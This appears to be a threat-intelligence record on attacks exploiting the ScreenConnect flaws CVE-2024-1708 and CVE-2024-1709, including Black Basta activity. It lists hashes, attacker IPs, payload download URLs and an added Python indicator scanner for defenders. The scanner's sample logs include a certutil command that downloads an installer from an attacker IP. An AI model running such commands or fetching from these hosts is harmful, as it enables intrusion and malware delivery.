Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
Common Information

  UUID                              6c90cfdd-3152-411a-ae03-427e7c53b648
  Fingerprint                       a4762cd0eb3f8787
  Analysis status                   DONE
  Considered CTI value              2
  Text language
  Published                         Feb. 27, 2024, midnight
  Added to db                       Oct. 15, 2024, 4:19 p.m.
  Last updated                      Nov. 17, 2024, 6:56 p.m.
  Headline                          Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
  Title                             Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities
  Detected Hints/Tags/Attributes    100/3/73
Attributes

"#Events" is the number of records in the database that carry the same attribute; a large value marks a generic attribute shared by many unrelated reports, not a strong indicator for this one. The per-attribute CTI Value column is empty for every row and is omitted below. Values are reproduced exactly as stored, including the defanged URLs.

Type        #Events  Value
CVE              25  cve-2024-1708
CVE              29  cve-2024-1709
CVE             140  cve-2023-27350
Domain           25  the.net
Domain            7  in.net
Domain            5  wipresolutions.com
Domain            2  dns.artstrailreviews.com
Domain           45  paste.ee
Domain            2  input-beats.gl.at.ply.gg
Domain           71  transfer.sh
Domain            2  instance-tj4lui-relay.screenconnect.com
Domain          272  outlook.com
Email             2  integratorlogin=pichet1208@outlook.com
File             11  web.dll
File              6  setupwizard.aspx
File              2  screenconnect.zip
File              3  screenconnect.core
File            256  net.exe
File             49  nltest.exe
File           1208  powershell.exe
File              2  diablo.log
File              2  c:\users\public\diablo.log
File           1018  rundll32.exe
File              2  09d.log
File              2  c:\users\public\09d.log
File              2  10443.exe
File              2  c:\users\public\10443.exe
File           1122  svchost.exe
File            226  certutil.exe
File              3  msappdata.msi
File              3  c:\mpyutd.msi
File            409  c:\windows\system32\cmd.exe
File              2  c:\mpyuts.msi
File              2  read_instructions_to_decrypt.txt
File              2  chromeset.exe
File              2  c:\chromeset.exe
File              1  c:\windows\system32\naet.exe
File              5  c:\windows\system32\bitsadmin.exe
File              2  c:\programdata\sc.exe
File             27  c:\windows\system32\msiexec.exe
File             20  setup.msi
sha256            2  cc13b5721f2ee6081c1244dd367a9de958353c29e32ea8b66e3b20b293fabc55
sha256            2  fa131238c3c35efe99cde59dd409c0436fd642b6bf5d56f994f52ab3a62bae4e
sha256            2  e3401d7699cc5067620e43bd24e8ccd437832c16f2fa7d5baaad8c170383cc92
sha256            3  8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600
sha256            2  3a659609850664cbc0683c8c7b92be816254eb9306e7fb12ad79d5a9af0fb623
sha256            2  47d83461ee57031fd2814382fb526937a4cfa9a3eea7a47e4e7ee185c0602b27
sha256            2  86b5d7dd88b46a3e7c2fb58c01fbeb11dc7ad350370abfe648dbfad45edb8132
IPv4              3  159.65.130.146
IPv4              3  23.26.137.225
MITRE ATT&CK     43  T1078.003 (Valid Accounts: Local Accounts)
MITRE ATT&CK    124  T1482 (Domain Trust Discovery)
MITRE ATT&CK     41  T1078.001 (Valid Accounts: Default Accounts)
MITRE ATT&CK    179  T1087 (Account Discovery)
MITRE ATT&CK    460  T1059.001 (Command and Scripting Interpreter: PowerShell)
MITRE ATT&CK    235  T1562 (Impair Defenses)
MITRE ATT&CK    492  T1105 (Ingress Tool Transfer)
MITRE ATT&CK     22  T1087.003 (Account Discovery: Email Account)
MITRE ATT&CK     72  T1087.001 (Account Discovery: Local Account)
MITRE ATT&CK    141  T1219 (Remote Access Software)
MITRE ATT&CK    542  T1190 (Exploit Public-Facing Application)
MITRE ATT&CK    422  T1041 (Exfiltration Over C2 Channel)
MITRE ATT&CK    472  T1486 (Data Encrypted for Impact)
Url               2  http://207.[246.74.189:804/download/diablo.log
Url               2  http://51.[195.192.120:804/download/09d.log
Url               2  http://198.[244.169.213:8045/download/10443.exe
Url               2  http://159.65.130.146:4444/a
Url               2  http://159.65.130.146:4444/svchost.exe
Url               3  http://23.26.137.225:8084/msappdata.msi
Url               2  http://23.26.137.225:8091/chromeset.exe
Url               2  https://paste.ee/r/mzeoz/0
Url               2  https://paste.ee/r/pxlkv/0
Url               2  https://transfer.sh/get/hcrhqun0yc/temp3.exe

Notes

cve-2024-1708 and cve-2024-1709 are the ConnectWise ScreenConnect vulnerabilities the headline refers to: a path traversal and an authentication bypass, respectively, affecting ScreenConnect 23.9.7 and earlier and fixed in 23.9.8. The bypass is reached through the setup wizard page, which is why setupwizard.aspx appears among the file attributes. cve-2023-27350 is the PaperCut MF/NG authentication bypass, not a ScreenConnect flaw; it is carried in the record because the source report mentions it.

Attributes with event counts in the hundreds or thousands (powershell.exe, svchost.exe, rundll32.exe, cmd.exe, net.exe, certutil.exe, outlook.com) are living-off-the-land binaries and common domains shared by a large fraction of the database and should not be alerted on by themselves; the domains the.net and in.net are almost certainly extraction fragments rather than real indicators. The low-count entries (the c:\users\public\ file paths, the .msi droppers, the sha256 digests, the two IPv4 addresses and the URLs) are the specific indicators of this report.

The three URLs written as 207.[246.74.189, 51.[195.192.120 and 198.[244.169.213 are defanged with a stray bracket; remove the bracket characters to recover the address before matching.
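The list above mixes defanged URLs, generic binary names and a handful of specific artefacts, so matching it against telemetry needs a little preparation. The following Python is an added example written for this page, not code from the original record or from the report it summarises: it refangs the URL indicators by stripping bracket characters and hxxp, folds the IP hosts found in those URLs into the IPv4 set (which is how 207.246.74.189 enters the set; the page itself lists that address only inside a defanged URL), deliberately leaves the generic binaries out of the file set, and runs the result over a few constructed proxy, Sysmon and EDR log lines. The sample log lines and the certutil command line in them are constructed for the example and are not from the report.

```python
import re

# Indicators copied from the record above. URLs are kept exactly as the page
# shows them (defanged); refang() normalises them before matching.
IOC_SHA256 = {
    "cc13b5721f2ee6081c1244dd367a9de958353c29e32ea8b66e3b20b293fabc55",
    "fa131238c3c35efe99cde59dd409c0436fd642b6bf5d56f994f52ab3a62bae4e",
    "8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600",
}
IOC_URLS = {
    "http://207.[246.74.189:804/download/diablo.log",
    "http://159.65.130.146:4444/svchost.exe",
    "http://23.26.137.225:8084/msappdata.msi",
    "https://transfer.sh/get/hcrhqun0yc/temp3.exe",
}
# File indicators specific enough to alert on by themselves. Generic binaries in
# the record (powershell.exe, rundll32.exe, svchost.exe, cmd.exe, certutil.exe)
# are left out on purpose: matching them would fire on every host.
IOC_FILES = {
    "c:\\users\\public\\diablo.log",
    "c:\\users\\public\\09d.log",
    "c:\\users\\public\\10443.exe",
    "c:\\mpyutd.msi",
    "c:\\chromeset.exe",
    "read_instructions_to_decrypt.txt",
}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b", re.IGNORECASE)


def refang(value: str) -> str:
    """Undo common defanging: drop the brackets of '[.]' (and the lone '['
    the page's URLs carry) and turn a leading hxxp(s) back into http(s)."""
    value = value.replace("[", "").replace("]", "")
    return re.sub(r"^hxxp", "http", value, flags=re.IGNORECASE)


# The record's own IPv4 list plus every IP host embedded in a URL indicator,
# so a bare connection to the host is flagged even when no URL is logged.
IOC_IPV4 = {"159.65.130.146", "23.26.137.225"} | {
    ip for url in IOC_URLS for ip in IPV4_RE.findall(refang(url))
}


def scan_line(line: str) -> list[tuple[str, str]]:
    """Return (indicator_type, indicator) pairs found in one log line."""
    hits = []
    lower = line.lower()
    for digest in SHA256_RE.findall(line):
        if digest.lower() in IOC_SHA256:
            hits.append(("sha256", digest.lower()))
    for ip in IPV4_RE.findall(line):
        if ip in IOC_IPV4:
            hits.append(("ipv4", ip))
    for url in IOC_URLS:  # compare the refanged form, report the stored form
        if refang(url).lower() in lower:
            hits.append(("url", url))
    for path in IOC_FILES:  # paths are stored lower-case; match case-insensitively
        if path in lower:
            hits.append(("file", path))
    return hits


def scan_logs(lines) -> list[tuple[int, str, str]]:
    """Scan many lines; returns (line_number, indicator_type, indicator)."""
    return [(n, kind, value)
            for n, line in enumerate(lines)
            for kind, value in scan_line(line)]


# Constructed sample log lines (proxy, Sysmon, EDR); not from the original report.
SAMPLE_LOGS = [
    "2024-02-21T10:14:02Z proxy src=10.0.0.12 GET http://159.65.130.146:4444/svchost.exe 200",
    '2024-02-21T10:14:09Z sysmon EventID=1 Image=C:\\Windows\\System32\\certutil.exe '
    'CommandLine="certutil.exe -urlcache -split -f http://23.26.137.225:8084/msappdata.msi c:\\mpyutd.msi"',
    "2024-02-21T10:15:30Z edr FileCreate Path=c:\\users\\public\\diablo.log "
    "Sha256=cc13b5721f2ee6081c1244dd367a9de958353c29e32ea8b66e3b20b293fabc55",
    "2024-02-21T10:16:00Z proxy src=10.0.0.13 GET https://www.example.com/index.html 200",
    "2024-02-21T10:17:45Z proxy src=10.0.0.12 GET http://207.246.74.189:804/download/diablo.log 200",
]

if __name__ == "__main__":
    for n, kind, value in scan_logs(SAMPLE_LOGS):
        print(f"line {n}: {kind} {value}")
```

Running it reports two hits on the first line (the IPv4 and the URL), three on the Sysmon line (IPv4, URL and the dropped c:\mpyutd.msi), two on the EDR line (digest and path), none on the benign proxy line and two on the last line, which only matches because the bracket was stripped from the stored URL and its host was added to the IPv4 set.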